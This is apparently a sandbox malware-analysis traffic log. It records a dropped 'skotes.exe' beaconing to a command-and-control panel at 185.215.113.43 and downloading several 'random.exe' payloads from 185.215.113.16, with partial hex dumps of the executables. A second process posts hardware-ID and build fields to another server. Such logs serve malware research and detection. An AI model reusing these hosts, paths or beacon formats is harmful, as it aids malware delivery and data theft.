0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: a9<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49832	185.215.113.43	80	7856	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 07:33:15.590462923 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 34 35 33 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1004537001&unit=246122658369
Nov 7, 2024 07:33:16.483570099 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 07 Nov 2024 06:33:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49850	185.215.113.43	80	7856	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 07:33:18.342432022 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 7, 2024 07:33:19.271697044 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 07 Nov 2024 06:33:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49871	185.215.113.43	80	7856	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 07:33:20.847805977 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 35 42 33 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B75B35F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Nov 7, 2024 07:33:21.791522980 CET	558	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 07 Nov 2024 06:33:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 36 66 0d 0a 20 3c 63 3e 31 30 30 34 35 35 30 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 65 37 65 37 62 39 63 61 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 30 34 35 35 31 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 38 65 36 62 31 63 61 37 32 64 64 35 33 34 64 62 30 35 37 65 62 34 31 30 61 34 39 34 64 39 64 23 31 30 30 34 35 35 32 30 33 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 64 30 32 34 36 62 35 63 62 34 66 36 35 32 32 34 32 37 66 61 65 31 64 61 61 38 65 39 65 62 34 66 66 66 37 62 35 63 36 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 30 34 35 35 33 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 [TRUNCATED] Data Ascii: 16f <c>1004550001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca30804042ba5ce902415450#1004551001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1004552031+++b5937c1a99d5f9dd0246b5cb4f6522427fae1daa8e9eb4fff7b5c630804042ba5ce902415450#1004553001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49882	185.215.113.16	80	7856	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 07:33:21.865475893 CET	55	OUT	GET /luma/random.exe HTTP/1.1 Host: 185.215.113.16
Nov 7, 2024 07:33:22.784785032 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 07 Nov 2024 06:33:22 GMT Content-Type: application/octet-stream Content-Length: 3249664 Last-Modified: Thu, 07 Nov 2024 05:56:00 GMT Connection: keep-alive ETag: "672c5670-319600" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 53 d3 15 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4a 04 00 00 d6 00 00 00 00 00 00 00 a0 31 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 31 00 00 04 00 00 5c 17 32 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 a0 05 00 68 00 00 00 00 90 05 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 a1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELSgJ1@1\2@Th@ @.rsrc@@.idata @neuqwbdo++@ivatdflj1n1@.taggant01"t1@
Nov 7, 2024 07:33:22.784847975 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 7, 2024 07:33:22.784858942 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 7, 2024 07:33:22.785486937 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 7, 2024 07:33:22.785561085 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 7, 2024 07:33:22.785573006 CET	1236	IN	Data Raw: a6 5d 93 63 bd ac a3 c3 01 ee 0f 5e 03 62 95 21 be 4e d4 63 48 32 b4 87 9a ee 48 6a bd ee 8f ee c1 12 13 5c bd 62 92 ec 7e 77 dc 87 cd 77 58 71 bd ee 8f e3 40 da ac ec 01 12 a8 40 1a 12 a0 f0 01 12 e0 ec 01 12 9c f0 01 12 08 ed 01 12 98 f0 01 12 Data Ascii: ]c^b!NcH2Hj\b~wwXq@@x$2d)c29c5@2kcm2vyy+c2ocFB{c6^bNcF2g2ocH
Nov 7, 2024 07:33:22.785793066 CET	1236	IN	Data Raw: a7 f2 c0 3c b4 af 9f 72 41 7a 90 63 bd 77 ec 87 c9 79 d4 87 d5 77 d4 87 cd a9 8f 63 bd ed 1b a8 e1 fa 17 45 91 d1 87 37 49 62 b4 67 de e1 1b a8 e1 0e 18 45 cd 9b 66 ed 31 12 94 ee 09 12 b8 72 73 fa a8 ee 19 12 a0 ec 9b 76 db 62 46 cf 63 4e 47 32 Data Ascii: <rAzcwywcE7IbgEf1rsvbFcNG2oyM~ M~ Mwcw=&cKzccqsTGJdM2qPbG2sH2F2oFcyyxmcBfFhwV}g!crA?c{qB
Nov 7, 2024 07:33:22.785804987 CET	1236	IN	Data Raw: e5 ef 8f 63 46 62 b4 73 84 32 b4 7b c2 ee 8f 63 a8 08 56 a8 e1 1c bd 5a 96 2b 77 67 bd ee 05 3f 47 62 b4 73 84 32 b4 7b c3 ee 8f 63 84 32 b4 6f bd ee 8f 63 46 b4 49 31 8a ba 5c 5b 9f af 7a 66 40 d0 8e f1 d9 80 19 54 77 55 f6 c9 23 e5 79 ed 8e 77 Data Ascii: cFbs2{cVZ+wg?Gbs2{c2ocFI1\[zf@TwU#yw`%Q]P#TNGbF;IJ{EJ4$%hOQ~s{HbsslmMG4$$GJ#TZw`%Q^Qe{%{vfoc;
Nov 7, 2024 07:33:22.785816908 CET	1236	IN	Data Raw: 09 12 9c ec 8b 6f 89 64 c1 ee 8f ee 09 12 a0 e6 96 ee 01 66 46 b0 19 78 e1 77 04 88 0d 79 d4 87 cd 77 d4 87 11 cd fc 87 0d 1f 50 ef 09 12 98 5a 7f ee 97 63 bd fd 23 24 9b f2 54 b4 22 32 90 e4 b6 ed 8f 63 c1 65 b2 3c 7e c7 70 3d 87 cb 72 43 9e 8c Data Ascii: odfFxwywPZc#$T"2ce<~p=rCpcmE.=@hMc=j#$?e~U&nvoYe1U&~E%hqPJa>GB>ex.cczfFYA*c<V
Nov 7, 2024 07:33:22.785830021 CET	1236	IN	Data Raw: e1 71 50 61 e7 be 19 d8 e1 f2 03 82 46 e0 13 46 c1 62 a7 29 01 f2 bf e6 80 f3 1a 68 e1 79 e4 87 c9 ef 5f e7 7d eb 19 c0 e1 f2 12 5c c2 fd 11 85 c0 ee 8f f0 0d ea 19 37 7f d9 92 a6 40 d1 97 ee 31 12 a0 d7 e6 77 a4 87 7e d1 92 94 8f 79 04 88 c1 b5 Data Ascii: qPaFFb)hy_}\7@1w~yy@cew`1^yPg0Ww0*&qPDA{5f,cw)fF2Jr
Nov 7, 2024 07:33:22.789760113 CET	1236	IN	Data Raw: 47 3a b4 a3 c0 fa b3 ee 11 12 a8 72 41 84 95 63 bd e4 d4 87 c5 ef 9e e8 8c ef 8f 63 48 3a b4 a3 42 b7 0f 7d a6 b0 91 63 bd 77 57 ef 01 12 ac ee 09 12 d0 8c 7e 73 59 73 4b 93 91 63 bd 77 80 8d b5 f3 8f 65 bd ee 18 2e f7 af 0c 66 46 b0 13 e1 c5 ee Data Ascii: G:rAccH:B}cwW~sYsKcwe.fFfF6GBF:1U\A{d7FFybU5AwRJ5)qQa2&AfqWhJ8O~ M~ M~ Mwaqh9lwg%FQKM@

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49926	185.215.113.43	80	7856	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 07:33:29.163786888 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 34 35 35 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1004550001&unit=246122658369
Nov 7, 2024 07:33:30.063224077 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 07 Nov 2024 06:33:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49934	185.215.113.16	80	7856	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 07:33:30.177409887 CET	56	OUT	GET /steam/random.exe HTTP/1.1 Host: 185.215.113.16
Nov 7, 2024 07:33:31.025157928 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 07 Nov 2024 06:33:30 GMT Content-Type: application/octet-stream Content-Length: 2097152 Last-Modified: Thu, 07 Nov 2024 05:56:13 GMT Connection: keep-alive ETag: "672c567d-200000" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 00 40 71 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 71 00 00 04 00 00 4b f0 20 00 02 00 40 80 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$b}...u^..uk..u_..{v..fz/.{f....uZ..uh..Rich.PEL8ng,@q@pqK @P.d. p.v@.rsrc .@.idata .@ @).@mjfoaubiPWP@luvachek0q@.taggant0@q"@
Nov 7, 2024 07:33:31.025175095 CET	112	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 7, 2024 07:33:31.025187969 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 7, 2024 07:33:31.025217056 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 7, 2024 07:33:31.025230885 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 7, 2024 07:33:31.025245905 CET	336	IN	Data Raw: 99 98 1b 86 0d 01 bf bf 8b d8 de ef 40 82 bc 24 2e 3c de 6d 84 12 f8 04 14 73 53 12 c8 6c c9 dc 80 b2 11 0b 0a ef 3f 55 f9 01 a4 34 9d cb 3b 0c 03 2f b5 ad 7d 0a b2 6d c2 77 51 61 bc 0c c9 75 9d 49 fd 39 89 e7 7d a5 a6 f8 99 ed 45 48 f4 9d 9d 8f Data Ascii: @$.<msSl?U4;/}mwQauI9}EHL29]mDvR;6rC;fV8(~[WUr"3etSF,9{:Fw,WUt.NGRGVGZG^G"G&G*G.F,GP2OE
Nov 7, 2024 07:33:31.025258064 CET	1236	IN	Data Raw: 93 b7 a3 db b1 fc 47 08 b4 63 6e d6 78 11 d8 d4 e6 e8 fa c2 bf 0c bd af 47 76 c3 15 2d c8 c9 2c 02 17 cc 5a 44 95 9e 23 ec 88 72 c2 98 15 f6 b1 2e f2 9e 85 7b 6b 8a 1d 5c 7b ba 52 0a 07 9f fb 69 ab 8b 1d 9d 77 f0 32 5c 6f 13 60 6f 40 1b 0a 74 88 Data Ascii: GcnxGv-,ZD#r.{k\{Riw2\o`o@t'\u':t_WegG=5j^32{]>w?\|ZiOzLos]2nBAR{{jgN"Esufr_/cw5E{b?p:m z1K:
Nov 7, 2024 07:33:31.025296926 CET	1236	IN	Data Raw: 9f 00 d5 af e1 40 08 7f 39 54 2d 15 7b 8c dd 3d 06 b8 8a f2 8e e1 49 ff 2f ef 78 0c 17 f9 c4 3d 9a 00 f1 72 ff 09 7f 02 8c ee cb 85 3a 2f ca d5 e1 1e 71 31 85 8b 5b e9 85 af 5a 12 f5 e6 09 e4 40 b7 d9 2d b0 95 11 d3 85 51 9a 09 e5 45 d4 7f 78 7e Data Ascii: @9T-{=I/x=r:/q1[Z@-QEx~$!Fx/k1trZgKDf5DwG\_mXbk!Hk8^wT%ed"\|Y(KsB_mxly-!I/\|{E(@ou[~\sks[SM28
Nov 7, 2024 07:33:31.025310040 CET	1236	IN	Data Raw: 9b 73 d3 0a 19 2b 86 4b 24 6f 3a 15 6e 0f 55 80 75 ef bf 13 1a 77 c2 3d 22 6a 6e 85 17 ad 42 ed 07 4e c2 bb 7b b3 69 12 07 ab 2b 7a f2 8b 9c 3c 30 8b 6d 0f 74 cf ba 57 84 6d 04 9e 78 c8 eb 7a 8f 13 9e 02 27 fb 77 cd 65 0f bc 0c 92 e3 9f 6b 8c b5 Data Ascii: s+K$o:nUuw="jnBN{i+z<0mtWmxz'wekGSP?:-~o7p[;NO{lCyY?R;\|\;o8fj#zoK>~^!\|{jq\0GB^wfON{j!.\|Hv4\|A1oeK
Nov 7, 2024 07:33:31.025321007 CET	1236	IN	Data Raw: d6 55 7f 13 74 bc df 0a 7e 75 5e 35 f6 0f d9 83 8a 94 c2 e7 bc 39 a1 9f bf b6 4b 1b 37 7c 0b 7a 45 81 b9 6b 22 4f dd 83 94 5e a1 bf 6d e9 c2 e2 23 ec 66 32 74 7c 93 02 97 73 17 fe ff ab 8b 3f 4e 75 d3 2a 02 4f c2 d3 3b 20 d2 60 79 01 b2 0f 7d 07 Data Ascii: Ut~u^59K7\|zEk"O^m#f2t\|s?NuO; `y}k/H,oG;N&#[u\|?+PY*\|GP6&\|Ku\|Os+?]tz_J2vE+bW?Fkz&\|?3nlIy\i4\|;z?Ro8/=jc
Nov 7, 2024 07:33:31.030108929 CET	1236	IN	Data Raw: 7f bc 19 1c 7b 75 7b 38 45 93 c2 ed 7a a2 ca bb 79 04 ab 38 95 aa 53 2e 22 b5 43 3b 60 0f 93 82 7d 3b 85 3e 8f c8 93 0d ce 04 aa 16 f4 89 a9 cb 67 45 92 a0 28 8c c3 17 2a 4a 74 1a 5a 90 6e 66 3f 16 df 87 4c cf f3 84 4b 90 c6 b7 55 ba fd 15 86 87 Data Ascii: {u{8Ezy8S."C;`};>gE(*JtZnf?LKUpDUo=f\|xx_v}#<Z:BcD\|7>"?\|C:GsS"{'(?Uq\|8AMyK3zgdSOpM}3Z5XB]U<a

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49970	185.215.113.43	80	7856	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 07:33:36.499205112 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 34 35 35 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1004551001&unit=246122658369
Nov 7, 2024 07:33:37.381294012 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 07 Nov 2024 06:33:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49980	185.215.113.16	80	7856	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 07:33:38.481616020 CET	140	OUT	GET /steam/random.exe HTTP/1.1 Host: 185.215.113.16 If-Modified-Since: Thu, 07 Nov 2024 05:56:13 GMT If-None-Match: "672c567d-200000"
Nov 7, 2024 07:33:39.296549082 CET	192	IN	HTTP/1.1 304 Not Modified Server: nginx/1.18.0 (Ubuntu) Date: Thu, 07 Nov 2024 06:33:39 GMT Last-Modified: Thu, 07 Nov 2024 05:56:13 GMT Connection: keep-alive ETag: "672c567d-200000"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	50007	185.215.113.43	80	7856	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 07:33:41.449594975 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 34 35 35 32 30 33 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1004552031&unit=246122658369
Nov 7, 2024 07:33:42.344840050 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 07 Nov 2024 06:33:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	50008	185.215.113.206	80	6972	C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 07:33:41.497559071 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 7, 2024 07:33:42.380683899 CET	203	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:42 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 7, 2024 07:33:42.488647938 CET	412	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFCFHJDBKJKEBFHJEHII Host: 185.215.113.206 Content-Length: 210 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 35 44 42 42 44 39 43 30 34 36 33 37 34 38 31 34 30 37 33 31 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 49 2d 2d 0d 0a Data Ascii: ------CFCFHJDBKJKEBFHJEHIIContent-Disposition: form-data; name="hwid"25DBBD9C0463748140731------CFCFHJDBKJKEBFHJEHIIContent-Disposition: form-data; name="build"tale------CFCFHJDBKJKEBFHJEHII--
Nov 7, 2024 07:33:42.772732019 CET	210	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:42 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	50012	185.215.113.16	80	7856	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 07:33:42.483108997 CET	54	OUT	GET /off/random.exe HTTP/1.1 Host: 185.215.113.16
Nov 7, 2024 07:33:43.369195938 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 07 Nov 2024 06:33:43 GMT Content-Type: application/octet-stream Content-Length: 2755072 Last-Modified: Thu, 07 Nov 2024 06:25:15 GMT Connection: keep-alive ETag: "672c5d4b-2a0a00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 80 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 2a 00 00 04 00 00 ea ec 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 